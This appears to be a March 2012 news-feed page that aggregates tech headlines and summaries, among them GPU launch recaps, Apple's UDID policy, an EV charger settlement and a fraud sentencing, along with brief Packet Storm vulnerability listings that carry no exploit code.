Continue reading Harry Potter Wizards Collection brings home all eight movies on a ridiculous 31 discs (video)

Harry Potter Wizards Collection brings home all eight movies on a ridiculous 31 discs (video) originally appeared on Engadget on Sun, 25 Mar 2012 10:54:00 EDT. Please see our terms for use of feeds.

Permalink   |  sourceAmazon, YouTube, Viddler  | Email this | Comments
Channel Image16:44 Tinc Virtual Private Network Daemon 1.0.18» Files ≈ Packet Storm
tinc is a Virtual Private Network (VPN) daemon that uses tunneling and encryption to create a secure private network between multiple hosts on the Internet. This tunneling allows VPN sites to share information with each other over the Internet without exposing any information.
Channel Image13:35 NRG to bring 200 fast-charging EV stations to the Golden State, pump $100 million into CA infrastructure» Engadget
Way back before NRG was making electric DeLoreans and building solar power plants, it co-owned a slew of power facilities in California with Dynegy -- an energy outfit that got caught up in a long-term litigation over some old energy contracts with the state. Long story short, that legal dispute became NRG's problem in 2006, after it acquired Dynegy's majority stake in the partnership -- a problem it's finally resolving by peppering California with 200 fast-charging EV stations. The $120 million settlement promises to create jobs, invest in the state's economy and provide job training for the stations' maintenance and installation crews.

NRG may be shelling out some serious cash, but the deal is still mutually beneficial -- those extra vehicle chargers will be running on its own fee-based eVgo network, after all. Governor Jerry Brown calls the settlement the beginning of a "virtuous circle" that will boost EV sales for the state, which will in turn, provoke investors to expand California's charging infrastructure, which will, of course, sell more cars. In fact, he's banking on it, and has signed an executive order setting targets for EV adoption. If all goes as planned, you'll be looking at a smog free San Francisco skyline by 2050. Won't that be nice?

Continue reading NRG to bring 200 fast-charging EV stations to the Golden State, pump $100 million into CA infrastructure

NRG to bring 200 fast-charging EV stations to the Golden State, pump $100 million into CA infrastructure originally appeared on Engadget on Sun, 25 Mar 2012 07:35:00 EDT. Please see our terms for use of feeds.

Permalink Forbes  |   | Email this | Comments
Channel Image10:22 Sky Anytime+ now available via all broadband providers» Engadget
Image
We knew it was coming, but now it's finally landed. Yep, those Sky+HD subscribers who get their internet from elsewhere are now free wander into the formerly fortified town of Anytime+. For the first time, all Sky+HD users with broadband can access the full range of online programming, which includes content from the BBC and ITV. Not a Sky customer, but like the sound of this? Sky's already thought of that, and should have something to ease your pain anytime now.

Sky Anytime+ now available via all broadband providers originally appeared on Engadget on Sun, 25 Mar 2012 04:22:00 EDT. Please see our terms for use of feeds.

Permalink   |  sourceSky  | Email this | Comments
Channel Image09:01 Apple Begins Rejecting Apps for Using the Unique Device Identifier (UDID)» MacRumors: Mac News and Rumors - Front Page
TechCrunch reports that Apple has begun rejecting iOS apps for the use of a unique device identifier known as the UDID. The site notes that several developers have reported rejections for the use of the UDID in the past week, and Apple is said to be ramping up the enforcement of this policy over the next few weeks.

As the name suggests, the UDID is a unique identifier for every iOS device. It's tied specifically to the hardware and can't be changed by the user. Apple had previously warned developers with the introduction of iOS 5 that the use of the UDID was deprecated and would be phased out. The sudden rejections, however, have caught some developers off guard:
“Everyone’s scrambling to get something into place,” said Victor Rubba, chief executive of Fluik, a Canadian developer that makes games like Office Jerk and Plumber Crack. “We’re trying to be proactive and we’ve already moved to an alternative scheme.” Rubba said he isn’t sending any updates until he sees how the situation shakes out in the next few days.
The reason for the phasing out of UDIDs from developer use is due to increased pressure on Apple due to the privacy implications. Apple and several App developers have been sued over the use of the UDID to track users across different apps. While the UDID doesn't specifically identify a user, the sharing of UDIDs across ad networks and apps can help piece together a valuable picture of activity and interests of the user of a specific device. Apple seems to be requiring apps to generate their own unique identifiers for each installation to avoid this ability to share such information across apps.


Recent Mac and iOS Blog Stories
Lines of Resellers Returning New iPads at Fifth Avenue Apple Store
Apple Loses Appeal in Italian Warranty Disclosures Case
Steve Jobs Tried to Hire Linux Creator Linus Torvalds to Work on OS X
Some Smart Covers Not Working Properly on New iPad
Angry Birds Space Launches on iOS and Mac


Channel Image06:57 Could Fido be joining the Canadian LTE club?» Engadget
Image
Those of you living north of the border have a few LTE options already, but could we see one more being added to the list? Depending on how that murky image above is to be understood, then maybe we will. It's alleged by staff that a new "LTE Voice and Data" bundle is showing up when accounts are being activated or upgraded. We're never convinced until the writing's on the wall (or at least the company website), but if you're on the Rogers-owned network, and wanting faster data, there's hope for you yet.

Could Fido be joining the Canadian LTE club? originally appeared on Engadget on Sun, 25 Mar 2012 00:57:00 EDT. Please see our terms for use of feeds.

Permalink   |  sourceMobileSyrup  | Email this | Comments
Channel Image04:55 Ask Engadget: using an iPad as a remote viewfinder?» Engadget
Image
We know you've got questions, and if you're brave enough to ask the world for answers, here's the outlet to do so. This week's Ask Engadget inquiry is from is from William who is looking for an solution to the problem of badly designed public spaces. If you're looking to send in an inquiry of your own, drop us a line at ask [at] engadget [dawt] com.

"Hi guys. I'm getting married in a church with a weird split-hall design. The result is that half of the attendees won't be able to see the ceremony at all! I'm wondering if I could hook up my Canon Rebel T3i up to my 3rd-generation iPad and use it as a quick-and-dirty closed-circuit display? There's no WiFi in the location, so it has to be a wired solution too. Please help me!"

It's an interesting request and that's why we're here: solving those problems that three minutes on Google just can't. So, dear friends, what say you? Wish the soon-to-be-wed couple all the best by adding a helpful solution to the comment feed and spread a little joy.

Ask Engadget: using an iPad as a remote viewfinder? originally appeared on Engadget on Sat, 24 Mar 2012 22:55:00 EDT. Please see our terms for use of feeds.

Permalink   |   | Email this | Comments
Channel Image04:00 NVIDIA GeForce GTX 680 Launch Recap» AnandTech

If the numbers are true, then most of you have already read our Kepler review, and you know that the card has made quite a splash - it's the highest-performing single-GPU card you can buy today, and it's got solid power consumption and a lower price than the AMD Radeon HD 7970 to boot. Kepler still needs to trickle down through the rest of NVIDIA's lineup, but for now NVIDIA has the high-end sewn up. Let's look at what its partners have put together.

  ASUS EVGA

Galaxy

Gigabyte
Part Number GTX680-2GD5 02G-P4-2680-KR 68NPH6DV5ZGX GV-N680D5-2GD-B
Core Clock 1006 MHz 1006 MHz 1006 MHz 1006 MHz
Memory Clock (Effective) 1502 MHz (6008 MHz) 1502 MHz (6008 MHz) 1502 MHz (6008 MHz) 1502 MHz (6008 MHz)
Boost Clock 1058 MHz 1058 MHz 1058 MHz 1058 MHz
Dimensions in inches (dimensions in mm) 10.08 x 4.37 x 1.47 (256.03 x 111.00 x 33.34) 10 x 4.38 x ?? (254 x 111.25 x ??) 10 x 4.33 x 1.57 (254 x 109.98 x 39.88) 10.83 x 4.96 x 1.50 (275 x 126 x 38)
Outputs DisplayPort, HDMI, DVI-I, DVI-D DisplayPort, HDMI, DVI-I, DVI-D DisplayPort, HDMI, DVI-I, DVI-D DisplayPort, HDMI, DVI-I, DVI-D
Included accessories 4-pin to 6-pin DVI to VGA, 2x 4-pin to 6-pin 2x DVI to VGA, 2x 4-pin to 6-pin 2x 4-pin to 6-pin
Warranty 3-year 3-year 3-year 3-year
Price (Newegg) $499.99 $499.99 $499.99 $499.99
 

MSI

PNY Zotac
Part Number N680GTX-PM2D2GD5 VCGGTX680XPB ZT-60101-10P
Core Clock 1006 MHz 1006 MHz 1006 MHz
Memory Clock (Effective) 1502 MHz (6008 MHz) 1502 MHz (6008 MHz) 1502 MHz (6008 MHz)
Boost Clock 1058 MHz 1058 MHz 1058 MHz
Dimensions in inches (dimensions in mm) 10.63 x 4.38 x 1.53 (270 x 111.15 x 38.75) ??? 11.10 x 4.9 x 2.3 (281.9 x 124.46 x 58.42)
Outputs DisplayPort, HDMI, DVI-I, DVI-D DisplayPort, HDMI, DVI-I, DVI-D DisplayPort, HDMI, DVI-I, DVI-D
Included accessories DVI to VGA, 4-pin to 6-pin DVI to VGA, 4-pin to 6-pin, HDMI cable DVI to VGA, 2x 4-pin to 6-pin
Warranty 3-year parts/2-year labor 1-year (Lifetime with registration) 2-year
Price (Newegg) $499.99 $529.99 $499.99

As we've noted in past recaps, you should take these card measurements with a grain or two of salt. Manufacturers haven't standardized on a unit of measurement for their cards - some measure in inches and some in metric. I've done the necessary conversions and presented all measurements in both inches and millimeters, but manufacturers play a bit loose with these measurements and the actual physical dimensions may not exactly match the dimensions given on the spec sheet.

Common to all of these cards is 2GB of GDDR5 on a 256-bit bus and all of Kepler's features - in fact, most of these cards have pretty much everything in common with one another, from the across-the-board stock clocks to the display outputs to the single-fan, dual-slot coolers to the lackluster bundles of accessories. This isn't uncommon with high-end launches of all-new architectures - we saw the same thing happen in our Radeon HD 7970 launch recap, another crop of cards that stuck to the reference design.

As such, there's not a ton to say about them, so I'll just make notes below when there's something about the card that makes it different from the stock card that we reviewed a couple of days ago.

ASUS (Product page)

 

 

EVGA (Product page)

 

Galaxy (Product page)

 

Gigabyte (Product page)

 

MSI (Product page)

 

MSI's graphics cards usually have a 3-year parts and 2-year labor warranty, and this card is no exception.

PNY (Product page)

 

This card is the only one in the lineup that costs more than $500, and there are a couple of reasons why: one is the lifetime warranty you can get by registering the card, and the other is the bundled HDMI cable. It's the only card in the lineup with anything more than power cables and DVI to VGA adapters. It's also the only card for which I can't find measurements (Amazon lists the length at eight inches, which I find suspect since the rest of the cards are at least ten). The card's dimensions should be similar to the others.

Zotac (Product page)

 

Zotac's is the only card in this lineup with a 2-year warranty instead of the 3-year warranty shared by most of the rest of them.

Channel Image01:41 Instagram opens signup page for Android port, release date still unknown» Engadget
Image
It's no secret that one of the most popular apps to ever hit the App Store will soon be coming to Android, and if you'd prefer to be one of the very first on your block to be notified... well, there's a website for that. Instagram has just opened up a signup page for Android loyalists, enabling folks to input their email address and await word on the download going live. Sadly, there's no hint on the aforesaid page that gets us any closer to a specific release date, but hey -- it's one less unspecified thing you have to remember, right? Pop that source link if your interest has been piqued.

Instagram opens signup page for Android port, release date still unknown originally appeared on Engadget on Sat, 24 Mar 2012 20:41:00 EDT. Please see our terms for use of feeds.

Permalink Electronista, TechCrunch  |  sourceInstagram  | Email this | Comments
Channel Image01:15 AMD Radeon HD 7870 Launch Recap» AnandTech

It has been a couple of weeks since we reviewed the Radeon HD 7800 series, but as we mentioned earlier this week and in our 7850 recap, that was just a paper launch - the cards hit the street only recently, and as usual we're going to go through all of the stuff from AMD's partners and give you the Facts.

  ASUS Gigabyte MSI

PowerColor

Part Number HD7870-DC2-2GD5 GV-R787OC-2GD

R7870 Twin Frozr 2GD5/OC

AX7870 2GBD5-2DH
Core Clock 1010 MHz 1100 MHz 1050 MHz 1000 MHz
Memory Clock (Effective) 1210 MHz (4840 MHz) 1200 MHz (4800 MHz) 1200 MHz (4800 MHz) 1200 MHz (4800 MHz)
Dimensions in inches (dimensions in mm) 10.16 x 5.12 x 1.7 (258.06 x 130.05 x 43.18) 11.02 x 5.28 x 1.67 (280 x 134 x 42.5) 10.63 x 4.65 x 1.65 (270 x 118 x 42) 9.5 x 4.38 x 1.50 (241.3 x 111.2 x 38)
Outputs 2x Mini DisplayPort, HDMI, DVI-I 2x Mini DisplayPort, HDMI, DVI-I 2x Mini DisplayPort, HDMI, DVI-I 2x Mini DisplayPort, HDMI, DVI-I
Included accessories DVI to VGA adapter, 6-pin extension cable, Crossfire bridge 2x 4-pin to 6-pin, Crossfire bridge Mini DP to DP, 2x 4-pin to 6-pin, Crossfire bridge DVI to VGA, Mini DP to DP, HDMI to DVI
Warranty 3-year 3-year 3-year parts/2-year labor 2-year
Price (Newegg) $359.99 $359.99 $369.99 $359.99
  PowerColor PCS+ Sapphire Sapphire OC
Part Number AX7870 2GBD5-2DHPP 11199-00-20G

11199-03-20G

Core Clock 1100 MHz 1000 MHz 1050 MHz
Memory Clock (Effective) 1225 MHz (4900 MHz) 1200 MHz (4800 MHz) 1250 MHz (5000 MHz)
Dimensions in inches (dimensions in mm) 9.5 x 4.38 x 1.50 (241.3 x 111.2 x 38) 10.24 x 4.45 x 1.38 (260 x 113 x 35) 10.24 x 4.45 x 1.38 (260 x 113 x 35)
Outputs 2x Mini DisplayPort, HDMI, 2x DVI-I 2x Mini DisplayPort, HDMI, DVI-I 2x Mini DisplayPort, HDMI, DVI-I
Included accessories DVI to VGA, Mini DP to DP, Crossfire bridge DVI to VGA, Mini DP to DP, 2x 4-pin to 6-pin, Crossfire bridge DVI to VGA, Mini DP to DP, 2x 4-pin to 6-pin, Crossfire bridge
Warranty 2-year 2-year 2-year
Price (Newegg) $369.99 $349.99 $359.99

As we've noted in past recaps, you should take these card measurements with a grain or two of salt. Manufacturers haven't standardized on a unit of measurement for their cards - some measure in inches and some in metric. I've done the necessary conversions and presented all measurements in both inches and millimeters, but manufacturers play a bit loose with these measurements and the actual physical dimensions may not exactly match the dimensions given on the spec sheet.

Common to all of these cards is 2GB of GDDR5 on a 256-bit bus, Eyefinity support, two 6-pin power connectors, and all of GCN's features. All but one of the cards also offer identical outputs: two mini DisplayPorts, one HDMI port, and one DVI-I port. The PowerColor PCS+ card also offers a second DVI-I output.

ASUS (Product page)

 

ASUS again uses its DirectCUII cooler on its 7870 - this cooler has made appearances in many of our other launch recaps, including that for the 7850, where the cooler was actually a good bit longer than the card itself. Since the 7870 is a longer card, that isn't an issue here. As with its 7850, ASUS applies a paltry 10MHz overclock to the core and the memory, but the bundled accessories are nothing to write home about - the biggest reason to choose this card over others is the 3-year warranty.

Gigabyte (Product page)

 

Gigabyte's 7870 employs a massive three-fan cooler, the better to cool its 100MHz (10%) core overclock, which is the highest clock in our recap - it's tied with one of the PowerColor cards, and while that one is $10 more expensive, it also has a slight memory overclock. The Gigabyte card's memory remains at stock clocks - if you've been following these recaps for awhile, you've probably noticed that factory overclocks tend to focus on the core rather than the memory - only three of the seven cards here have memory cards, and none of them are higher than 4%.

MSI (Product page)

 

Like many of the cards here, MSI's 7870 has a two-fan cooler with a big heatsink, but otherwise it has a hard time distinguishing itself from the crowd - it's tied for the most expensive card, but it has only a modest 50MHz core overclock and a three-year parts and two-year labor warranty that falls in the middle of the rest of the pack. 

PowerColor (Product page)

 

As is often the case in these recaps, both PowerColor and Sapphire are offering two versions of the 7870, one with stock clocks and a slightly more expensive model with a factory overclock. This is the stock clocked version, and it's the only card in this lineup that uses AMD's reference cooler for the 7870 series.

PowerColor PCS+ (Product page)

 

This PowerColor card is $10 more expensive than its lower-end cousin, but it comes with a 100MHz core overclock and 25MHz memory overclock that should net you an increase in frames per second. Its also the only card here with a second DVI port, which it adds to the 7870's standard complement of Mini DisplayPorts and HDMI. If you value warranty length over factory overclocks, though, this one only has a two-year warranty to its name.

Sapphire (Product page)

 

This card has the same stock clocks and 2-year warranty as the PowerColor card, but it's $10 cheaper (the cheapest card in the recap), includes a better accessory bundle, and uses a two-fan cooler with a more impressive heatsink. 

Sapphire OC (Product page)

 

This card is identical to the other Sapphire offering in almost every way - the warranty, included accessories, and cooler are all the same. Your extra $10 gets you a 50 MHz overclock on both the core and the memory - if you're not comfortable doing your own overclocks, you can spend the extra $10 and get a few frames per second for it. If you do your own overclocks, save the cash.

Channel Image01:12 XBMC Eden officially steps out of beta, available for download now» Engadget
Image
Been snacking on popcorn with the beta build of XBMC 11.0 Eden since it got released last December? If, you'll be pleased know that the full-on release version is now officially available for download. In case you don't recall, this latest build of the media center house many new features, not limited to Addon Rollbacks (in case you hate their new builds), a plethora of speed-improvements, official "in- sync support" for iOS devices, AirPlay functionality and UI tweaks. There's also good news for Ubuntu users, as XBMCbuntu Final has been officially announced as the successor to XBMC Live. Excuse the pun, but if you're ready to taste the fruit now that it's ripe, you'll find the full details for both and the download link for Eden at the source link below.

XBMC Eden officially steps out of beta, available for download now originally appeared on Engadget on Sat, 24 Mar 2012 20:12:00 EDT. Please see our terms for use of feeds.

Permalink   |  sourceXBMC  | Email this | Comments
Channel Image01:00 AMD Radeon HD 7850 Launch Recap» AnandTech

It has been weeks since we reviewed AMD's Radeon HD 7870 and 7850 cards, but unlike the 7900 and 7700 series cards, the 7800 series was given the typical middle-child treatment and paper launched. and cards began appearing at retailers just this week.

While Kepler's launch has cast a long shadow over the top end of the graphics market (a GTX 680 recap is coming later today, dont worry), but competition is still fierce, and as we noted in our review the 7850 is a solid performer and the fastest 150 watt card on the market today. Let's look at what AMD's partners have for us.

  ASUS Gigabyte HIS MSI

PowerColor

Sapphire
Part Number HD7850-DC2-2GD5 GV-R785OC-2GD

H785F2G2M

R7850 Twin Frozr 2GD5/OC AX7850 2GBD5-2DH 11200-01-20G
Core Clock 870 MHz 975 MHz 860 MHz 900 MHz 860 MHz 920 MHz
Memory Clock (Effective) 1210 MHz (4840 MHz) 1200 MHz (4800 MHz) 1200 MHz (4800 MHz) 1200 MHz (4800 MHz) 1200 MHz (4800 MHz) 1250 MHz (5000 MHz)
Dimensions in inches (dimensions in mm) 10.2 x 4.5 x 1.7 (259.08 x 114.3 x 43.18) 9.49 x 5.39 x 1.67 (241 x 137 x 42.5) ??? 7.76 x 4.37 x 1.50 (197 x 111 x 38) 7.99 x 4.37 x 1.50 (203 x 111 x 38) 8.27 x 4.13 x 1.38 (210 x 105 x 35)
Included accessories DVI to VGA, Crossfire bridge 4-pin to 6-pin, Crossfire bridge DVI to VGA, Crossfire bridge DVI to VGA, Mini DP to DP, 2x 4-pin to 6-pin, Crossfire bridge DVI to VGA, Mini DP to DP, HDMI to DVI DVI to VGA, Mini DP to DP, 4-pin to 6-pin, Crossfire bridge
Warranty 3-year 3-year 2-year 3-year parts/2-year labor 2-year 2-year
Price (Newegg) $259.99 $259.99 $259.99 $259.99 $259.99 $259.99

As we've noted in past recaps, you should take these card measurements with a grain or two of salt. Manufacturers haven't standardized on a unit of measurement for their cards - some measure in inches and some in metric. I've done the necessary conversions and presented all measurements in both inches and millimeters, but manufacturers play a bit loose with these measurements and the actual physical dimensions may not exactly match the dimensions given on the spec sheet.

Common to all of these cards is 2GB of GDDR5 on a 256-bit bus, Eyefinity support, and all of GCN's features. All cards also offer identical outputs: two mini DisplayPorts, one HDMI port, and one DVI-I port. Normally we see a range of prices from different manufacturers due to factory overclocks, longer warranties, or included accessories, but in this case we've got identical prices across the board, making it much easier to make an apples-to-apples comparison among cards. As long as you don't have any particular brand loyalty, just pick the one with the value-added extras that you need the most.

ASUS (Product page)

 

The ASUS 7850 features a 10MHz overclock on both the GPU and the RAM, but it's so small that it won't increase framerates much at all over stock clocks. Its bundle of accessories is pretty sparse, but its 3-year warranty is tied with the Gigabyte card for the longest of the bunch.

 

This ASUS card's defining characteristic is the DirectCUII cooler, a huge two-fan cooler that was actually designed for longer cards like the Radeon HD 7950. On the shorter 7850, it hangs over the end of the card by quite a bit, requiring the use of an extension cord to make the 6-pin power connection accessible. This move may make the GPU cooler (and, by extension, get you a better overclock), but it will also require a larger case.

Gigabyte (Product page)

 

The Gigabyte card has a bit in common with the ASUS card - a big fancy two-fan cooler, a 3-year warranty, a bare accessory bundle - but it's a bit shorter in length, and it features an impressive 115MHz (about 12%) overclock on the core, which should actually net you a measurable increase in game performance. The memory clock , however, is left at stock.

HIS (Product page)

 

Here's a first in AnandTech Graphics Card Launch Recap History: the dimensions for this HIS card aren't available through Newegg or HIS's product page, or anywhere else that I can find (the product page gives "box dimensions", which is useful if you're shipping the card but not if you're using it). Luckily, its humdrum single-fan cooler means that the card should be unremarkable in this regard - I'd guess it should be close to eight inches long.

Otherwise, HIS doesn't give you much in terms of value-adds - it uses stock clocks, the two-year warranty is the minimum I like to see on components that cost this much, and the DVI to VGA adapter and Crossfire bridge constitute a pretty small accessory bundle. 

MSI (Product page)

 

With the MSI card, we're back to custom two-fan coolers and big heatsinks. A 40MHz (~4.5%) core overclock is respectable but small, and it uses stock memory clocks. A 3-year parts and 2-year labor warranty splits the difference between the longest and shortest warranties on the list.

Where MSI beats the competition is in its accessory bundle, which is actually worthy of the name - in addition to basics like power cable adapters (the Newegg product image appears to include two of these, though it only has the one six pin power plug on the back) and a DVI to VGA adapter, it also includes a Mini DisplayPort to DisplayPort adapter.

PowerColor (Product page)

 

The PowerColor card is a lot like the HIS model in its single-fan cooler, 2-year warranty, and stock clocks, but it adds some useful display adapters to the package. PowerColor's card is the only one here that's using AMD's reference cooler for the 7850 series (visible on this page of our review).  

Sapphire (Product page)

 

Sapphire's take on the 7850, which uses another big two-fan cooler, is the only one in the list with a memory overclock worthy of the name. The 50MHz (4%) RAM overclock along with the 60MHz (6.5%) core overclock should give you a noticeable increase in framerates if you're not comfortable doing your own overclocking. Other benefits include the respectable accessory bundle and other drawbacks include a shorter 2-year warranty.

Channel Image00:27 Mobile Miscellany: week of March 19th, 2012» Engadget
Mobile Miscellany: week of March 19th, 2012
Not all mobile news is destined for the front page, but if you're like us and really want to know what's going on, then you've come to the right place. This past week, we've spotted the Lumia 610 in two new colors, and the open source community received new goodies from the likes of HTC, Qualcomm and Samsung. These stories and more await after the break. So buy the ticket and take the ride as we explore the "best of the rest" for this week of March 19th, 2012.

Continue reading Mobile Miscellany: week of March 19th, 2012

Mobile Miscellany: week of March 19th, 2012 originally appeared on Engadget on Sat, 24 Mar 2012 19:27:00 EDT. Please see our terms for use of feeds.

Permalink   |   | Email this | Comments

Sat 24 March, 2012

Channel Image22:10 World's largest telescope underway, scientists definitely observe big bang» Engadget
Image
Once again astronomers are observing formative explosions, but this time a little bit closer to home. Three million cubic feet of planet earth is being blasted from the Chilean Andes as work on what will be the world's largest telescope begins. The location is the Carnegie Institution's Las Campanas Observatory, and the project is a collaboration between South Korean, Australian and American institutions to create the Giant Magellan Telescope. The first mirror segment is just being completed, and is so precise, it matches its optical prescription to within a millionth of an inch. The project will cost $700 million once complete, small change we say for a chance to glimpse light from the edge of the Universe.

World's largest telescope underway, scientists definitely observe big bang originally appeared on Engadget on Sat, 24 Mar 2012 17:10:00 EDT. Please see our terms for use of feeds.

Permalink Slashdot  |  sourceGMTO  | Email this | Comments
Channel Image21:52 Ars readers call for hackerspaces in the Ars OpenForum» Ars Technica

Ars Technica's beginnings are rooted in a community that has always tinkered, built, and modded computer hardware. As it has evolved, the do-it-yourself philosophy has also triggered other communities that make their own stuff. Most recently, the "make movement" has made a name for itself in the world of open source hardware and hacking. The movement covers a broad range of interests, edging into some hardcore do-it-yourself projects. Some groups meet in hackerspaces, but the movement at large seems mostly based on the spirit of building things yourself or with other people.

Read the rest of this article...

Read the comments on this post


Channel Image21:03 FCC says AT&T is wrong about saving T-Mobile jobs» GadgeTell
AT&T made some rather harsh and poorly-timed comments on Friday regarding T-Mobile’s announcement to close a handful of call centers and cutting 1,900 jobs. AT&T basically said all the layoffs could have been avoided had the FCC let it take over T-Mobile. Many people would be inclined to disagree including the FCC. The FCC gave more »
Channel Image20:41 Rent-a-fraudster website operator gets nearly 3 years in prison» Ars Technica

A Belarusian who operated a rent-an-accomplice business for bank thieves has been sentenced to 33 months in prison in New York.

Dmitry Naskovets pleaded guilty to operating CallService.biz, a Russian-language site for identity criminals who trafficked in stolen bank-account data and other information.

Naskovets was arrested in 2010 in the Czech Republic at the request of US authorities and subsequently extradited to the US. A co-conspirator named Sergey Semashko was arrested the same day in Belarus and has been charged there.

According to authorities, the two launched their site in Lithuania in June 2007 and filled a much-needed niche in the criminal world—providing English- and German-speaking "stand-ins" to help crooks thwart bank security screening measures.

In order to conduct certain transactions—such as initiating wire transfers, unblocking accounts or changing the contact information on an account—some financial institutions require the legitimate account holder to authorize the transaction by phone.

Thieves could provide the stolen account information and biographical information of the account holder to CallService.biz, along with instructions about what needed to be authorized. The biographical information sometimes included the account holder’s name, address, Social Security number, e-mail address and answers to security questions the financial institution might ask, such as the age of the victim’s father when the victim was born, the nickname of the victim’s oldest sibling, or the city where the victim was married.

More than 2,000 identity thieves used the service to commit more than 5,000 acts of fraud, according to authorities.

"Through his website, Dimitry Naskovets served as the middleman for a network of identity thieves who used his many employees to impersonate thousands of victims in exchange for a stake in the profits from the fraudulent transactions they helped facilitate," Manhattan US Attorney Preet Bharara said in a statement. "This case is another example of how cybercrime knows no geographic boundaries and of how we will work with our partners in the United States and around the world to catch and punish cyber criminals."

The thieves obtained the information through phishing attacks and malware placed on victims’ computers to log their keystrokes.

CallService.biz would then assign someone who matched the legitimate account holder’s gender and was proficient in the needed language. That person would pose as the account holder and call the financial institution to authorize the fraudulent transaction.

Read the comments on this post


Channel Image20:22 PHP 5.4.0 Denial Of Service» Files ≈ Packet Storm
PHP version 5.4.0 built-in web server denial of service proof of concept exploit.
Channel Image19:36 Tweet seats deserve to be booed out of the theater» Ars Technica

Marketers, when they hit, can identify the seed of a product, service or organization and plant it in fertile soil where it will grow like mad. They can tease out the implications of the object they're charged with publicizing or find the motif that others are most likely to riff on. But when they fail, they can fail in the most mortifying fashion. All around the country, the marketing staff at live performance spaces big and small are embracing the "youthquake" in the grooviest way I've seen in years. They are offering up "tweet seats" to the kids.

It is an operatically stupid idea.

Read the rest of this article...

Read the comments on this post


Channel Image19:36 Chrome OS coming to ARM?» Engadget
ImageMany moons ago, Google made it quite clear we wouldn't be seeing its browser-based OS on any tablets or phones, but it never said Chrome OS wouldn't run on devices powered by similar silicon. In fact, the issues tracker at the Chromium OS project shows that work's being done to get Chrome OS compatible with ARM architecture, and in particular a Samsung Exynos 5250 chip. That Sammy silicon appears to be inside a new bit of hardware, codenamed "Daisy," but deeper digging failed to provide further details about the mystery device. While it certainly seems like Google's working on a new ARM-powered gadget, it's important to note that the Chromium project functions largely via user contributions, so the work might not be directed by Mountain View. You don't have to take our word for it, though. Head on down to the source link to see the evidence first hand, and feel free to form your own opinion.

Chrome OS coming to ARM? originally appeared on Engadget on Sat, 24 Mar 2012 14:36:00 EDT. Please see our terms for use of feeds.

Permalink Liliputing  |  sourceChromium OS  | Email this | Comments
Channel Image19:22 Laoy8! 3.0sp1 Cross Site Scripting» Files ≈ Packet Storm
Laoy8! CMS version 3.0sp1 suffers from a cross site scripting vulnerability.
Channel Image19:22 Event Calendar PHP Cross Site Scripting» Files ≈ Packet Storm
Event Calendar PHP suffers from a cross site scripting vulnerability.
Channel Image19:03 AOL may sell off some of its 800 patents for cash » Ars Technica

AOL, a company that’s been struggling with shrinking sales over the last several years, may be looking for new sources of income. According to Bloomberg “three people with knowledge of the matter” said the company is hiring investment firm Evercore to find buyers or licensees for some of its more than 800 patents. The three sources also said Evercore would “explore other strategic options” for the company, without going into more detail.

Since 2009, when AOL separated from media content giant Time Warner, the web company has seen a 29 percent drop in revenue, according to Bloomberg. Part of this could be due to the ever-diminishing returns of AOL’s once ubiquitous dial-up service (subscription revenue from AOL's dial-up dropped 18 percent from 2010 to 2011). Earlier this month, AOL cut more than 40 employees from AIM, their Instant Messenger department.

The three anonymous sources also said that several private-equity firms have recently approached AOL about privatizing the company and buying out its shareholders, but that AOL has not yet made a deal with any other company. AOL’s CEO Tim Armstrong has said publicly that he would be open to going private, and was in talks with Yahoo as early as September, although no deal was initiated then, either.

Investment Bank MDB Captial Group said licensing some of its patents could earn AOL as much as $1 billion in licensing fees. A quick search of AOL’s patents reveals such prime intellectual property as “e-mail integrated instant messaging” which is included in most e-mail clients these days, a patent for “host based-intelligent results related to a character stream” much like Google search’s auto-complete, and a “system for automated translation of speech” similar to a system developed by Microsoft and shown off earlier this year. Large companies like Google and Microsoft might be potential buyers for such patents in order to prevent infringements on alternative ways of developing products similar to theirs, or simply to avoid patent lawsuits down the road.

Evercore has been hired by companies like McGraw Hill, mortgage insurer PMI, and the airline Northwest Air, to find buyers for portions of the companies or to assist with restructuring.

Read the comments on this post


Channel Image18:40 Google asks developers to create privacy policies for their apps» GadgeTell
Over the past several weeks, app developers have been criticized for not explicitly stating what information they collect and what it does with said data. Path and Twitter are just two applications that were updated to inform users their address books would be uploaded to servers. This situation has gotten the attention of many individuals, more »
Channel Image18:29 Shutting down your gadgets at takeoff and landing: not such a bad idea» Ars Technica

Bowing to pressure from travelers, the FAA has decided to "revisit" the de facto ban on the use of gadgets during take-off and landing. Depending on the outcome of this re-examination of the rules, the future may well allow us to remain glued to our screens for an extra fifteen minutes at each end of a flight. But is this really a future we should be welcoming?

While nothing will change in the immediate future, this "revisit" opens the door to end-to-end gadgetry: if the rules change we will be glued to our screens from the moment we first take our undersized and uncomfortable seats right until the time the pod bay doors are opened and we escape our flying sardine cans.

I think this is a step backwards, and that the pressure that the FAA is under is a sad reflection on modern life.

Read the rest of this article...

Read the comments on this post


Channel Image18:00 Apogee MiC review» Engadget
Image
It's no secret that a few of us here at Engadget HQ have an affinity for mobile recording tech. Perhaps you could blame some of our fledgling amateur music careers, but at any rate, we love to get our hands on tech that allows us to lay down tracks on-the-go. It's also no surprise that Apogee would offer up another product that would look to do just that. As a complement to the outfit's Jam guitar adapter, the Apogee MiC is the latest foray into mobile recording. Much like its guitar specific counterpart, the MiC is both iDevice and Mac compatible and its compact stature won't take up precious real estate in your travel pack. But, as you may expect, staying mobile comes at a premium. So, is the $249 price tag a deal breaker for the MiC? Is it a small price to pay for adding a solid microphone to your mobile recording setup? Journey on past the break to find out.

Continue reading Apogee MiC review

Apogee MiC review originally appeared on Engadget on Sat, 24 Mar 2012 13:00:00 EDT. Please see our terms for use of feeds.

Permalink   |   | Email this | Comments
Channel Image17:22 vBulletin vBShout 6.0.5 Cross Site Scripting» Files ≈ Packet Storm
vBulletin vBShout module versions 6.0.5 and below suffer from a cross site scripting vulnerability.
Channel Image17:21 Former Apple TV Engineer Claims New Apple TV Interface Discarded 5 Years Ago [Updatedx2]» MacRumors: Mac News and Rumors - Front Page
Macgasm notes an interesting tweet by former Apple TV engineer Michael Margolis who claims that the new Apple TV interface designs were "tossed out 5 years ago because [Steve Jobs] didn't like them."


Alongside the 3rd Generation iPad, Apple also introduced a new version of the Apple TV that supports 1080P video. With it came an updated interface for the set-top box, (shown above) with icon-based category buttons and large billboard-style artwork for content. The interface was also rolled out to previous 2nd Generation Apple TV owners in a software update.

Margolis goes on to say that "now there is nobody to say 'no' to bad design", referring to Steve Jobs' passing. Some MacRumors readers have complained about the new design, and others felt it was a paving the way for Apple TV apps in the future.

